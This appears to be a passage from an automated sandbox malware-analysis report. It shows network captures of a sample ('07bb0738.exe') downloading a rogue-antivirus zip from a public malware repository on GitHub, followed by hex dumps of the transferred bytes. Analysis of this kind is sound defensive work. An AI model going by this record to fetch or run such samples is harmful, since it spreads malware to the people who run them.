                                                                                                                                                    2022-09-29 12:59:03 UTC7744INData Raw: 05 87 4e 75 b6 cd 74 07 9a 6a 63 98 fd 61 2e 5f 6c 4f 3c 57 56 57 b0 ee bf 1b 9f c1 8a 9d 96 1a d8 e8 8c b9 55 6b bc 9a 3c 41 f7 99 a4 33 dc c2 6e cc d7 ea f2 2e 1f 13 02 ae 81 b5 32 57 c0 43 44 2e 22 7e 9d a3 1b af 75 61 e8 e0 1a c8 2b 6f 91 13 c5 1a 1c dc 07 27 a4 b1 17 31 dc c0 ad fc a3 74 8f 8d a1 c5 2e 86 aa 83 d6 bc 25 41 38 dc 95 30 98 e8 68 93 b1 21 db 9b d7 2e a2 40 4e 63 ad fa 23 98 ce a9 e4 5e 01 5e 46 96 3e 70 cc 56 5d 1c 03 5b 0a 70 68 26 1f 32 b7 8e c9 72 42 46 41 08 e0 3b 0c 98 05 b2 18 dd 55 15 4a ec 22 8b cf 6b b1 2c 74 f6 3d 8b bf 5e 18 23 1f 33 44 81 a2 ea 4e cc f2 e7 c3 f8 12 db a1 58 60 51 66 53 ee fd 37 55 61 33 ba 60 e4 cd ed e5 49 b5 f3 83 c4 aa 24 f1 84 04 fb 24 64 f2 1c e3 a8 71 28 35 c6 bf 9f d2 25 f5 a5 a4 84 2b 50 ff 57 53 e3
                                                                                                                                                    Data Ascii: Nutjca._lO<WVWUk<A3n.2WCD."~ua+o'1t.%A80h!.@Nc#^^F>pV][ph&2rBFA;UJ"k,t=^#3DNX`QfS7Ua3`I$$dq(5%+PWS
                                                                                                                                                    2022-09-29 12:59:03 UTC7760INData Raw: 17 07 4f 67 6b 6c f4 db f2 00 0c 8a 41 4e de 7e 8c 6a 05 68 66 2e c6 72 93 fe 01 f9 00 47 92 ce 7b 43 05 ac fa 27 3e 99 3c db 4e 8a 49 a4 04 21 b4 0f 08 b2 d2 f4 5c 42 ab 14 f8 1c 1a 29 82 ed be db ab c2 5a 0d 39 29 55 b1 8d b7 0c 2a 66 28 1e 43 22 c4 2c 45 7c f3 d1 48 c1 f0 72 4a f3 a3 f7 62 ab 73 fe e2 3f 56 7f 39 22 ff 7c 01 fc 21 c2 e7 be 10 41 02 08 ee 41 7a 1f 84 15 1a 8c e4 aa 3a 60 05 c5 dc 44 6a 76 a1 18 54 7f 21 2c de 51 3c 2e 20 b1 fb 94 33 5b 40 1f d9 60 e7 71 d1 e7 89 03 a3 25 5e 7c 00 2a 28 f1 7e 65 e8 20 56 6f 2c df 8d e4 c1 a3 20 a3 a5 02 75 98 b5 cb 9a 1e b0 90 81 64 1b 45 af 31 96 8e 3b 4f 3c 4f 3d 6c 45 7b 67 92 43 5d 24 1d 99 24 d1 7b 2e 98 62 ca 7d 3c 88 e4 2c 41 81 73 99 8c 91 e0 a8 f2 32 99 02 ed 11 77 95 7e 1d da 5f 6a 24 2c f2 07
                                                                                                                                                    Data Ascii: OgklAN~jhf.rG{C'><NI!\B)Z9)U*f(C",E|HrJbs?V9"|!AAz:`DjvT!,Q<. 3[@`q%^|*(~e Vo, udE1;O<O=lE{gC]$${.b}<,As2w~_j$,
                                                                                                                                                    2022-09-29 12:59:03 UTC7776INData Raw: 0a 6f 22 76 ea b6 03 94 0f a2 b5 62 5a d3 e9 8a 58 c5 dd 95 de 27 e8 be 6a 54 5f 23 da f6 84 43 32 7c 46 14 be 19 e2 da b3 1a 1c aa 1f 02 46 23 7d 80 72 e0 2d 0b 5f 9c 7f 81 0e e1 37 7c e3 1d 1f 1a 08 8c 1e 9a 9a 80 b1 a9 41 0b 98 f8 82 8c a3 f8 4c bb fe cc 27 03 22 ed 58 d3 9f 38 7c ab f1 c4 4e ba ac 4d 5d e7 c5 c1 96 a4 4b 20 51 a4 b0 c2 d1 de 3b 48 a0 ea f4 15 30 d3 70 9e 38 79 84 ac 29 ce 1f a2 ec 86 f3 5f 2f 07 3f 40 4c 36 85 a7 03 2a 00 da de 1c fc ef 14 b0 6e 04 75 e0 d7 39 b2 2d e3 e5 ce 37 f6 96 25 ae eb c0 f4 3d 0c cd 7e 62 aa 27 f9 79 f2 3e ef f4 11 d3 7d aa 34 b7 f5 ab bd 5b 5c 53 99 85 a4 d7 69 d8 44 d6 b5 d0 35 15 54 fb 31 53 27 df 34 de d1 e1 15 db b4 7c 9b 0e 31 c7 d4 6c 2e dc 0b 17 b2 ec fe db 1a c4 24 cd 0e 67 96 00 0b 35 a0 d7 02 e6 b1
                                                                                                                                                    Data Ascii: o"vbZX'jT_#C2|FF#}r-_7|AL'"X8|NM]K Q;H0p8y)_/?@L6*nu9-7%=~b'y>}4[\SiD5T1S'4|1l.$g5


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    61192.168.2.349738140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:04 UTC7787OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    62140.82.121.3443192.168.2.349738C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:04 UTC7788INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:09 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:04 UTC7788INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    63192.168.2.349739185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:04 UTC7790OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    64185.199.108.133443192.168.2.349739C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:04 UTC7790INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1410736
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "245193138e3f9b39cf44c134a58bf8b376783e8722bddc3a8150360e1df811da"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 082B:AB9E:ECAD7E:FC2F3E:6335934D
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:04 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6929-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456344.240072,VS0,VE158
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: c1c494118b2a36d2a033024b46d3928b53bfce18
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:04 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:04 UTC7791INData Raw: 50 4b 03 04 14 00 01 00 08 00 07 13 99 43 46 06 5c d7 fa 85 15 00 00 8a 1f 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 2e 65 78 65 c6 7a f1 ff 6f 5f 2b 10 01 9f 9f e1 23 1b 17 e7 90 6d 67 f3 c3 f9 24 f2 59 57 1e ae 47 e5 70 43 6f 74 d3 73 c5 89 ff cc 24 c7 9e c3 ac d7 0a a2 52 de 99 d6 8b 1a 61 86 8b 3a 8a 7f ba a0 aa 63 ff 6c 89 3f a6 2c 72 ef 29 69 ae 9c 49 04 bf f3 7a 15 30 09 32 46 b3 35 83 df 62 92 46 b9 b1 59 06 cd 5d 8b 43 b1 1a 81 70 6f ca af 98 7f 22 13 fe 1d 95 a8 28 7f d5 3e 47 f6 a5 4d 36 8f 22 37 d9 7e 91 94 7d da 95 a4 c0 f6 56 43 62 16 e8 5f 2e 55 e0 4c eb f1 7f 05 c8 09 ee c1 82 9e a9 36 6f a6 d9 d4 c8 95 fa 88 a7 ce 2e 0d d1 9f 23 41 c5 a4 5b 09 88 31 b6 e0 f6 2e ae a8 b9 3d 9e fd 7d 10 72 10 c9 3d 42 20 0c
                                                                                                                                                    Data Ascii: PKCF\Endermanch@Antivirus.exezo_+#mg$YWGpCots$Ra:cl?,r)iIz02F5bFY]Cpo"(>GM6"7~}VCb_.UL6o.#A[1.=}r=B
                                                                                                                                                    2022-09-29 12:59:04 UTC7792INData Raw: 38 34 d4 8c 23 2a 46 52 0f 01 cf ce 99 ca 59 56 0f 64 05 eb d7 03 ea 04 c7 b6 43 68 33 5c 8f f1 e6 c3 12 09 e4 c1 4a f9 49 af 7b 6b 8f a4 13 34 1e e0 c7 db 7d 85 b5 74 2f c8 af 45 e0 0c 46 7c ec 7e 8f 00 69 aa d4 d5 bf 16 a0 2d af 97 64 4f d4 45 97 44 1b 57 0c 24 ac 2b 03 71 7a 18 5f de f1 bb e6 1b 09 58 ce c6 a0 66 61 d8 6f d8 85 eb 6e 3b 1e d5 51 80 6d 88 77 8b 05 ba 98 ab 70 e3 11 65 0b 16 33 c2 7c 4d c2 70 86 10 82 46 e0 fc 93 8a e5 9c 60 98 23 84 96 07 5b be 0f 31 0f 00 e3 0a 17 b0 d1 5b 32 18 d9 2f 08 7d 35 44 a5 34 2a 71 b4 d8 9c 15 d1 59 df 27 b6 cc 6b 26 9d 1b e3 ea 3a e0 d5 e0 7a 3f 36 97 63 84 f8 02 24 6e 45 69 59 cb 33 87 fe 1a 86 1a 61 a9 7d a6 fb a9 df 72 d6 75 a0 d3 d4 45 ff a7 fd e2 0c f5 9c eb 86 5a 2a 88 e8 19 b8 f9 ba 40 7c b6 ad 17 1d
                                                                                                                                                    Data Ascii: 84#*FRYVdCh3\JI{k4}t/EF|~i-dOEDW$+qz_Xfaon;Qmwpe3|MpF`#[1[2/}5D4*qY'k&:z?6c$nEiY3a}ruEZ*@|
                                                                                                                                                    2022-09-29 12:59:04 UTC7794INData Raw: 2e ed 04 f3 f2 94 1c b2 cc 8b 66 6e 0f 08 b2 d6 5a 5f 20 c0 5e 5e 21 20 2a 8b 89 11 80 6d 0b 3c 5f 32 24 1a 0f f6 f9 a3 07 38 02 b9 2d dd c4 a3 81 21 dc 15 01 41 88 fd 48 ce cc 91 c7 47 3d 78 4b d3 48 08 b8 af 73 14 b7 1a 81 49 90 ce d0 1a 9b 7d 5e f3 de 3d c0 5a a1 65 2d 06 18 0d 29 3d 9d b0 3d 10 28 3e b6 52 a0 dc 29 f9 f1 7d 26 ef 1d 05 53 f0 ed ee 98 66 ce 05 e2 28 98 4b b0 67 59 b6 ae 06 4f 94 f2 f1 d7 c4 38 87 be 8b 0a 26 d3 81 43 33 19 62 f7 37 f8 e3 a4 d2 9e 11 95 10 e1 a6 34 13 d5 8b d3 19 56 21 84 a9 ef 57 f2 c4 49 3f 57 f4 6d 85 4e b8 db 4a f4 4c 4f 03 74 30 45 b6 75 93 71 e3 ab cd f4 28 37 31 e9 8c 05 e0 09 89 d7 c3 fe 3c d8 8f ab 66 aa 3d c1 14 84 3d 0a 4e 02 82 ee 84 af 27 1f 99 76 cb 88 70 a3 e9 af ea e4 32 a3 6a 75 d6 ab a2 71 26 7c d2 45
                                                                                                                                                    Data Ascii: .fnZ_ ^^! *m<_2$8-!AHG=xKHsI}^=Ze-)==(>R)}&Sf(KgYO8&C3b74V!WI?WmNJLOt0Euq(71<f==N'vp2juq&|E
                                                                                                                                                    2022-09-29 12:59:04 UTC7795INData Raw: 98 2a 4c e8 ea d3 90 89 e6 9a 52 be 30 ee 35 8b b0 59 21 d1 ca 09 c5 11 cc 8e 16 a1 90 35 03 e4 ef 1c 89 3e 8c 5e 5c fa 3c 94 2e 3b b6 a8 71 68 e7 dd e6 94 f3 a3 08 f7 ae 39 57 4c d4 1b 0e d3 99 90 ed 37 e5 ed d1 d0 05 12 75 9e d3 7f 98 2c 1f 62 30 2d b0 fb 29 10 60 53 b2 2a df 10 f4 34 23 e3 99 99 16 02 60 f3 e5 9f 1a a2 30 26 7c 28 b6 27 2d 69 d0 6a 80 24 88 d9 74 2f ee d2 2f e9 7f 27 32 65 bc 5b 53 7a 26 75 2a 74 6a bd 8c 4d dd ed 22 94 4a 2d 0c 79 5f 77 da 60 59 9f ee e3 33 61 60 c4 e7 3a e4 01 38 35 66 83 54 61 06 d4 e1 f4 d3 2f 12 a7 02 91 8b da 94 1e 53 70 30 dc 6b 7d 6a 83 64 ea 8e 98 a2 b9 03 75 88 a4 6e af 08 75 68 28 78 7d 5a 7d 7e 57 80 8d 33 a0 fa 23 c3 1e 74 50 a6 5a 39 66 96 8a 5f 7c c0 24 b8 63 13 9d 2b 70 5a b8 ec 78 f3 b8 7b 42 d9 df f6
                                                                                                                                                    Data Ascii: *LR05Y!5>^\<.;qh9WL7u,b0-)`S*4#`0&|('-ij$t//'2e[Sz&u*tjM"J-y_w`Y3a`:85fTa/Sp0k}jdunuh(x}Z}~W3#tPZ9f_|$c+pZx{B
                                                                                                                                                    2022-09-29 12:59:04 UTC7796INData Raw: 06 f4 7f 6b 8e c2 32 65 f9 f8 61 46 a7 69 52 19 9c fc d4 d2 ad 67 cc 58 67 77 6a e7 c1 b4 39 c9 88 79 39 de 81 db 95 16 c3 3c ad 96 49 4b d2 95 e4 a4 d4 f1 b4 56 65 a0 19 44 5f 51 90 9e 89 f4 b7 66 16 45 f6 80 5f 7d d8 ee 91 6a 41 43 6b 71 7c ff c2 fe 52 68 ac 2d df 6e cc 43 63 8b 21 89 f6 5e 2f ad d0 68 db 81 06 3a 4f 00 17 47 fd 66 f5 79 e3 ae 14 c4 83 a9 ca a6 b3 88 95 66 de f5 b2 31 14 19 07 f8 3e 1a 0d bd 67 73 9e b3 03 07 f5 0b aa ab 29 e8 99 34 94 b1 7a c4 5d 06 bc 0e 80 8e ff 0d cd 44 95 15 6c 58 b6 e3 11 01 39 7e 92 28 07 dd 6b ed d1 18 04 20 99 04 49 da e6 5a 1c c3 14 4f 5c ff 50 3b 21 22 41 de e3 50 b1 7e 3f e6 6a 85 63 a9 54 77 bc b8 30 a7 9a f4 28 a4 be d0 6d 4c 25 66 47 92 ed 04 87 43 ba f7 2c 64 c3 bf 94 fc 5c c6 ae 55 68 69 6d 47 1d db ee
                                                                                                                                                    Data Ascii: k2eaFiRgXgwj9y9<IKVeD_QfE_}jACkq|Rh-nCc!^/h:OGfyf1>gs)4z]DlX9~(k IZO\P;!"AP~?jcTw0(mL%fGC,d\UhimG
                                                                                                                                                    2022-09-29 12:59:04 UTC7798INData Raw: 3c 88 f4 76 a0 1a 43 a5 68 9f cd 69 f9 0b 01 6d 0a 0b 54 8f 50 c6 16 6e 98 73 13 a2 60 0d 1f cd 8d 64 1a 30 0e ce 30 c3 79 6e 48 3e 8f c1 6d 0f 9e da 4d 60 1e 63 55 a6 da 7a e8 2e c6 1b 45 9d 07 9c 26 7f 3c 31 33 25 54 2f 34 ef 57 8e d7 39 b0 f8 db 1c e8 de 95 cc 80 22 83 51 0a 9d 5c 74 53 d3 8c 00 41 5b 87 dd f6 4c 16 51 92 67 71 a6 d6 8f f3 72 af 5c ed c6 27 d9 ab c8 e0 da 5c 5b 6d 29 7e d0 35 09 af 29 ed d1 6a 5e ab 1c 78 ca 7a a9 4a ba 95 24 7e f8 48 66 2e a5 48 0c 14 06 40 bb f6 11 2a 6f e5 51 33 c4 b3 26 45 79 4f 22 41 66 f8 ac 81 a1 a6 6e 3e 9a ee 56 83 52 6d 25 a7 20 27 52 16 ee 72 00 2e 84 b7 49 5a f0 76 d9 bf 35 78 5a 55 0c c3 36 ef fa 70 9b cd cf b1 4e 1d 44 19 f5 80 b2 67 62 b4 ac 6a 24 f4 0e bc 6b 4c 29 f2 76 be 65 8e c7 1f 8e 6b 3f d9 7d 77
                                                                                                                                                    Data Ascii: <vChimTPns`d00ynH>mM`cUz.E&<13%T/4W9"Q\tSA[LQgqr\'\[m)~5)j^xzJ$~Hf.H@*oQ3&EyO"Afn>VRm% 'Rr.IZv5xZU6pNDgbj$kL)vek?}w
                                                                                                                                                    2022-09-29 12:59:04 UTC7799INData Raw: 3b 69 db ce 63 dd 1a 9d ce f9 dd 2c 6f 1b ef 00 23 a4 a5 3c 5b 7a 30 c6 ea 4a f3 01 97 a9 7b fe f4 5f aa 4a f9 22 63 67 d3 55 dc d0 eb 4f 99 0f 94 31 21 50 9a 10 00 e9 6e f9 e4 cb 9a ef 0a 70 8a 79 0f 93 03 cf f3 bb 1d 26 55 77 c0 81 60 88 8f b9 21 98 36 fe 4d 8c 18 8c 27 6c 3c 93 f4 cd f7 2c 51 74 3e 5f 24 36 48 19 bd 0d 2a c7 85 27 3c fe 0b 8c e4 3b 44 33 d0 ef c9 61 86 0c 36 88 25 f3 fa 90 9d d1 ee 8a 27 4f 29 c2 7d 68 d6 8d c3 ec 27 2d 39 87 90 12 94 8e 33 36 c2 b9 5c 8f 95 04 66 e7 bc 09 2a f3 4a ed 31 db ba aa 92 c8 3b f2 d9 e5 73 2d a6 f3 da af 00 1b e9 0d be 54 37 7c 8f 96 7a 84 1d 67 42 70 6b 2f 8b 0d a1 fd 5f 54 70 ae 0e 0b 22 ac f1 54 b5 63 0e 01 80 19 3a 39 52 59 ee 81 cf 58 07 30 41 48 8b 4e 63 66 1d c9 8b a2 e2 d7 ba 48 ba 0e f8 28 95 86 ee
                                                                                                                                                    Data Ascii: ;ic,o#<[z0J{_J"cgUO1!Pnpy&Uw`!6M'l<,Qt>_$6H*'<;D3a6%'O)}h'-936\f*J1;s-T7|zgBpk/_Tp"Tc:9RYX0AHNcfH(
                                                                                                                                                    2022-09-29 12:59:04 UTC7800INData Raw: ec ea ae fd 84 a5 98 45 0e 7c 60 67 08 28 bb 50 79 95 cf b3 0d 21 5f bb 79 80 46 e0 d4 86 66 29 56 0f 35 c1 84 55 34 c4 4d 94 4c bd 91 44 92 db 62 bf f9 e0 13 79 3a e7 bd d2 7c cb 01 ea bd ec cf 60 3f e3 ba f4 62 e2 4c d6 37 1a a5 dd bd 68 7e 77 08 2e 29 0f bf 42 0f 5c 03 0d 3f 9a f5 0d f4 17 f4 e1 93 c4 85 db 2e 53 31 d0 f5 fc d2 ab a1 00 12 c1 6a 9d b3 3e 14 d0 37 b9 1a 98 9c b9 cb 62 43 61 fa 39 0c dd e7 56 6d f3 00 2a eb 7e b7 53 9b 65 86 9d 0e 32 d7 6f 03 d6 5b 2b 4d de 0c d2 43 22 b4 9e e7 e0 5e 88 44 8e 68 ac 11 fc 16 f8 12 15 19 f1 e5 73 8f 83 80 14 15 b3 ae 20 04 39 62 4c 33 79 92 49 f0 10 10 f0 b7 fe 9e 6f f5 cd d1 da 27 bf 96 86 c9 3f e3 2b 26 81 7e 72 21 a7 ab 60 f1 0b 05 7d 8d 79 4f 55 49 16 fb 2f 2c bc b5 96 88 27 4e 6f b8 a7 53 a1 0e 6f 9d
                                                                                                                                                    Data Ascii: E|`g(Py!_yFf)V5U4MLDby:|`?bL7h~w.)B\?.S1j>7bCa9Vm*~Se2o[+MC"^Dhs 9bL3yIo'?+&~r!`}yOUI/,'NoSo
                                                                                                                                                    2022-09-29 12:59:04 UTC7802INData Raw: 9e ac 79 2b cf c6 89 cb e0 a9 42 70 8e b3 9d 8f 97 73 52 19 8d 00 02 73 22 c5 ce 15 fb b0 85 e4 2d e7 62 ba 2f 4a b3 a4 11 6d 6e f3 58 aa e1 02 02 44 a2 7c e9 d6 93 83 2b 49 0b ca 34 4a d4 00 9a 6b a2 fd 0c 6b 58 ae 8a 26 7c 1d 4b a3 a3 3f 1f b0 fe 91 5f 2e 68 02 4b 72 24 9d 3d c0 e9 bc 2f a7 fc 64 9b b4 81 fd 97 fc 12 29 53 d7 c8 43 fa 2d 07 b1 e1 42 5e 52 78 f9 1f 1f b0 ca 74 f7 92 c4 4d 96 a2 cf a7 81 fc 2b 84 6a f7 1f 10 20 de ca 76 64 31 97 4c dc fe 4f 29 72 29 e2 b7 22 95 e9 ea 24 43 c6 33 90 d4 76 a4 8f f1 4b bb 11 4a 31 33 d8 e1 ab 00 cd b7 a0 af a9 a5 ef e1 70 91 49 40 ba 46 d3 e5 35 71 2f 4e 83 32 5e df 77 a4 6b b6 1f c2 c3 1a 95 f7 18 0b f4 c2 22 52 d8 0b 8c ad 65 f6 f8 f0 87 b7 b7 0c 32 fa 0a 58 ba 0e f3 c7 bb e5 b3 48 da 54 b5 7a 7c c9 f7 e4
                                                                                                                                                    Data Ascii: y+BpsRs"-b/JmnXD|+I4JkkX&|K?_.hKr$=/d)SC-B^RxtM+j vd1LO)r)"$C3vKJ13pI@F5q/N2^wk"Re2XHTz|
                                                                                                                                                    2022-09-29 12:59:04 UTC7803INData Raw: 47 2a 20 bd fc e2 fb 81 cb 1f 1f 4f 27 a0 f6 8b fa e3 5d 86 28 61 1f 7e 08 41 29 90 8a e4 c9 7d 58 29 47 5d 79 15 23 cb 04 ef 25 57 33 db 22 f1 76 29 04 c9 02 30 c8 66 89 3d fb a9 c7 b8 4b 5a b5 9a 4a fe 97 2a 16 4b 05 ee 82 03 a2 b0 04 eb 52 06 59 0a 02 8f de 32 c7 31 d7 9a ac 48 f3 03 af 82 8c f4 64 ff 8e 04 8c 30 fe 38 d3 25 94 8c 6a 41 2e 95 da 50 07 88 52 fd d1 5d 2d 38 9b 32 7d f6 49 79 8f 72 a7 99 d2 41 92 0f 0f 6d 47 7a 4e e2 4b 26 a8 c2 17 a1 80 94 52 61 f2 55 5e 8c f5 1d f4 85 70 b0 99 bf de f0 42 b7 71 50 6c 76 ef 4f 24 9a 06 c2 a3 2a 6c bf fd ec 9a 34 26 48 c6 00 d4 dd 98 d6 8f e9 42 11 63 66 ff 2f 8d ad ff 60 74 05 62 9d a6 d6 a3 53 6a 97 46 1b 08 36 67 46 4d e5 e3 19 9f 0e 3a 1c b3 3e ca 8a ab c3 39 d1 b8 0d 71 57 43 7e 60 0c 84 37 5a b7 93
                                                                                                                                                    Data Ascii: G* O'](a~A)}X)G]y#%W3"v)0f=KZJ*KRY21Hd08%jA.PR]-82}IyrAmGzNK&RaU^pBqPlvO$*l4&HBcf/`tbSjF6gFM:>9qWC~`7Z
                                                                                                                                                    2022-09-29 12:59:04 UTC7804INData Raw: 3c 02 02 69 fb 58 1e d7 e4 05 a1 ca 60 34 15 3a 4b 26 c2 2c 9d cd 36 66 dc 8f 94 b1 87 87 9c 6b 8b e8 ec 55 0f 44 90 ed c3 bb ab 7a 03 95 22 1a 2b 5f 2e 97 e5 57 73 12 75 30 3f 7f fb 1c 6a 6f f2 7e e3 2e b0 87 93 9d 5c d9 f9 40 2e 37 44 e6 3b 94 7f 8d 96 ec 51 db 5d 43 da 1f 5d 9b 87 7a 97 8c 19 86 ac 4a 9c 19 1f 66 3e 82 85 2d ad 26 b4 16 02 d3 23 e1 52 11 d9 63 0a d9 1f 06 97 9c 7c f1 84 b3 69 69 bd 8d d7 c1 1e f9 7e c8 c5 af 4b d4 a2 bd 54 19 83 ab 1c 07 c6 9c 24 40 8b b2 95 1d 53 0d 1d 1d bc e2 6c 57 49 1b 34 6e 0c 97 e9 e7 73 8f 71 e5 b4 14 e9 ef ba 65 11 22 29 d3 9f 7b 65 25 68 0f 93 16 0f 80 43 dc cd b7 9b 7a 3e 33 1d 2f cc e7 42 63 af e0 de f3 b3 eb 50 92 2a 2e 6d 30 db 84 25 7b 89 e4 e8 22 36 5b ab e2 b6 2a ec 8f 78 13 88 43 0e 91 e2 98 04 9d 73
                                                                                                                                                    Data Ascii: <iX`4:K&,6fkUDz"+_.Wsu0?jo~.\@.7D;Q]C]zJf>-&#Rc|ii~KT$@SlWI4nsqe"){e%hCz>3/BcP*.m0%{"6[*xCs
                                                                                                                                                    2022-09-29 12:59:04 UTC7806INData Raw: 31 7d a4 6e 3d 64 14 cc d8 0f fc 37 41 e0 80 f4 19 44 a9 09 6c 6b 8e cb 57 9e 10 cb 7e 02 7e 98 73 ee 50 57 ac 9d 33 db 71 79 d6 e7 21 b3 2e 01 1f ad f6 c9 74 c2 e4 c6 80 49 c9 b4 db 20 ae 50 b9 6f 57 19 6b 7c 9d f2 c9 ae ff 79 f2 43 40 be 40 19 64 80 13 db 2a 4e ad 9b c0 37 3e 1a 39 b5 5d 6f 47 75 e5 db 28 ea cc da 00 b8 35 9e a4 cc 0a 76 75 61 92 40 57 64 d9 bf 71 1b 97 c4 94 47 82 43 a2 8c 38 ba f1 87 81 f2 f9 bf ef da b2 e3 a3 f3 11 7d 41 0d 41 09 4b d1 84 79 c5 78 7d 4f 36 66 86 2d 12 7d b7 d3 c7 e8 1b 7e ad 54 45 bf 31 ed 50 1c ef a6 b1 51 4f 8f 5d c5 8f 5d 8d a6 5f 4b 34 5c e7 49 16 7e 16 ca 86 60 bb 9f 4d b8 38 5d cb bd f1 9d 9b ee a2 1f ba 4b 3e 63 82 33 30 fa 28 13 32 46 80 ac 11 99 30 44 ba 0b da 7c b0 5b 14 e1 7b 51 cf 48 a5 9a cf c3 c4 fe 27
                                                                                                                                                    Data Ascii: 1}n=d7ADlkW~~sPW3qy!.tI PoWk|yC@@d*N7>9]oGu(5vua@WdqGC8}AAKyx}O6f-}~TE1PQO]]_K4\I~`M8]K>c30(2F0D|[{QH'
                                                                                                                                                    2022-09-29 12:59:04 UTC7806INData Raw: 38 dd e8 1f 1e 90 1b 73 3e 5a 95 d7 40 45 82 30 68 e8 c7 55 b1 1e fd 77 5e 5e 0b 7f 7b 8d fa 95 37 6a d2 cb d4 ce c0 c3 ac e4 e6 d6 c6 a1 62 94 da a0 cb 61 1e 19 44 a4 af 63 36 b0 95 c2 a8 f5 14 9b 46 1e 86 fb a8 81 1a a5 0a 22 d0 73 89 9e 20 84 ff d5 6b fa 1c a1 90 cf 20 65 0a 81 27 83 39 5e ac 3f f3 44 89 9c b0 37 ef d3 15 ca 20 f4 93 69 a9 6c 14 71 ef 9a c7 aa 89 e8 47 af af e4 c3 fd 1f bc a1 d6 e5 b5 2a 0c e9 c5 6a 90 32 e3 9c f2 e5 32 98 34 87 6b 43 20 e3 60 75 32 a2 da fd c2 84 24 21 c9 cb f9 b4 0e 1a aa 73 bc 81 ff 17 96 ff f0 d7 94 99 bc 84 6c a9 7f 6b 88 7b f3 25 fa fe 86 f0 56 d3 0d 79 ad 13 5a 56 ef 4b 7e 6a 4b a9 4e df b6 af 0c c2 97 e7 f1 b2 6f 77 fa bd 3f 55 83 1a 22 50 b9 c9 1d 53 c7 0d 96 13 b7 fd 5d 44 31 1d e3 92 f9 99 15 7a ef 45 05 42
                                                                                                                                                    Data Ascii: 8s>Z@E0hUw^^{7jbaDc6F"s k e'9^?D7 ilqG*j224kC `u2$!slk{%VyZVK~jKNow?U"PS]D1zEB
